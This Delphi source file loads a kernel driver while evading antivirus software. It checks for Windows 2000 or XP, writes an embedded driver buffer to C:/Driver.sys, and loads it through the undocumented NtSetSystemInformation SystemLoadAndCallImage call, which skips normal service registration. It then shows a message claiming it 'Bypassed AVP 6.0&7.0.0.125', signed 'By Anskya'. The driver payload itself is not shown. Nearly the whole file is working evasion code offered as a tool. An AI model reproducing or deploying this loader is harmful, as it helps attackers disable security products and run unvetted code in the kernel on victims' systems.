program Project2; uses Windows, Native, JwaWinType, Unit_Driver; function Is2KXp(): Boolean; var OSVer: TOSVersionInfo; begin Result := False; OSVer.dwOSVersionInfoSize := Sizeof(TOSVersionInfo); if GetVersionEx(OSVer) then begin if (OSVer.dwPlatformId = VER_PLATFORM_WIN32_NT) then begin if (OSVer.dwMajorVersion = 5) and ((OSVer.dwMinorVersion = 0) or (OSVer.dwMinorVersion = 1))then begin Result := True; end; end; end; end; function DriverSaveFile(lpszName: PChar):Boolean; var hFile:THandle; BytesWrite: dword; begin Result := False; DeleteFile(lpszName); hFile := CreateFile(lpszName, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ, nil, CREATE_NEW, 0, 0); if hFile = INVALID_HANDLE_VALUE then Exit; if WriteFile(hFile,DriverBuf,DriverSize, BytesWrite, nil) then Result := True; CloseHandle(hFile); end; var StrInit: TString; GGSImage: SYSTEM_LOAD_AND_CALL_IMAGE; begin if (Is2KXp()) then begin if DriverSaveFile('C:/Driver.sys') then begin RtlInitAnsiString(@StrInit, '/??/C:/Driver.sys'); RtlAnsiStringToUnicodeString(@GGSImage.ModuleName, @StrInit, True); OutputDebugString('Load Driver: C:/Driver.sys'); NtSetSystemInformation(SystemLoadAndCallImage, @GGSImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)); MessageBox(0, 'Bypassed AVP 6.0&7.0.0.125', 'By Anskya', 0); end; end; end.